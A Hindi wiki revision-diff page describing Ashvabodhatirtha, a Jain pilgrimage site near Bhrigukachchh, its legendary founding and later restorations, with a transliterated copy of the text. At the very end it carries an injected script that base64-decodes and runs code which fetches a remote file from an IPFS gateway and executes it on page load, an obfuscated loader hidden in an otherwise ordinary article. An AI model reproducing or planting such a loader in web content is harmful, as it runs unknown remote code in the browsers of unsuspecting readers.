Difference between revisions of "अश्वबोधतीर्थ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*भृगुकच्छ के निकट एक जैनतीर्थ जिसका उल्लेख विविधतीर्थ-कल्प में है।  
+
*[[भृगुकच्छ]] के निकट एक [[जैन]] [[तीर्थ]] जिसका उल्लेख '''विविधतीर्थ-कल्प''' में है।  
*जिन सुव्रत अश्वबोधतीर्थ प्रतिष्ठानपुर से आए थे और इस स्थान के निकट वन में उन्होंने राजा जितशत्रु को उपदेश दिया था।  
+
*जिन सुव्रत अश्वबोधतीर्थ [[प्रतिष्ठानपुर]] से आए थे और इस स्थान के निकट वन में उन्होंने राजा जितशत्रु को उपदेश दिया था।  
 
*जितशत्रु उस समय [[अश्वमेधयज्ञ]] करने जा रहे थे।  
 
*जितशत्रु उस समय [[अश्वमेधयज्ञ]] करने जा रहे थे।  
*[[जैन धर्म]] में दीक्षित होने के उपरांत उन्होंने यहाँ एक चैत्य बनवाया जो अश्वबोधतीर्थ कहलाया था।  
+
*[[जैन धर्म]] में दीक्षित होने के उपरांत उन्होंने यहाँ एक चैत्य बनवाया जो '''अश्वबोधतीर्थ''' कहलाया था।  
*जैनग्रंथ प्रभावकचरित में अश्वबोध मंदिर का इतिहास वर्णित है।  
+
*जैन ग्रंथ '''प्रभावकचरित''' में अश्वबोध मंदिर का [[इतिहास]] वर्णित है।  
*इसमें इसका [[अशोक]] के पौत्र संप्रति द्वारा जीर्णोद्वार कराए जाने का उल्लेख है।  
+
*इसमें इसका [[अशोक]] के [[पौत्र]] संप्रति द्वारा जीर्णोद्वार कराए जाने का उल्लेख है।  
*1184 ई. के लगभग रचे गए सोमप्रभासूरि के ग्रंथ कुमारपाल प्रतिबोध में भी इस तीर्थ में हेमचंद्रसूरि द्वारा प्राचीन मंदिर का पुनर्निर्माण करवाने का उल्लेख है।  
+
*1184 ई. के लगभग रचे गए सोमप्रभासूरि के [[ग्रंथ]] '''कुमारपाल प्रतिबोध''' में भी इस [[तीर्थ]] में हेमचंद्रसूरि द्वारा प्राचीन मंदिर का पुनर्निर्माण करवाने का उल्लेख है।  
 
*इस तीर्थ को शकुनिकाविहार भी कहते थे।  
 
*इस तीर्थ को शकुनिकाविहार भी कहते थे।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 51| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 17: Line 20:
 
[[Category:गुजरात]]
 
[[Category:गुजरात]]
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
 
[[Category:गुजरात के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 07:54, 4 May 2018

  • bhrigukachchh ke nikat ek jain tirth jisaka ullekh vividhatirth-kalp mean hai.
  • jin suvrat ashvabodhatirth pratishthanapur se ae the aur is sthan ke nikat van mean unhoanne raja jitashatru ko upadesh diya tha.
  • jitashatru us samay ashvamedhayajn karane ja rahe the.
  • jain dharm mean dikshit hone ke uparaant unhoanne yahaan ek chaity banavaya jo ashvabodhatirth kahalaya tha.
  • jain granth prabhavakacharit mean ashvabodh mandir ka itihas varnit hai.
  • isamean isaka ashok ke pautr sanprati dvara jirnodvar karae jane ka ullekh hai.
  • 1184 ee. ke lagabhag rache ge somaprabhasoori ke granth kumarapal pratibodh mean bhi is tirth mean hemachandrasoori dvara prachin mandir ka punarnirman karavane ka ullekh hai.
  • is tirth ko shakunikavihar bhi kahate the.


tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 51| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>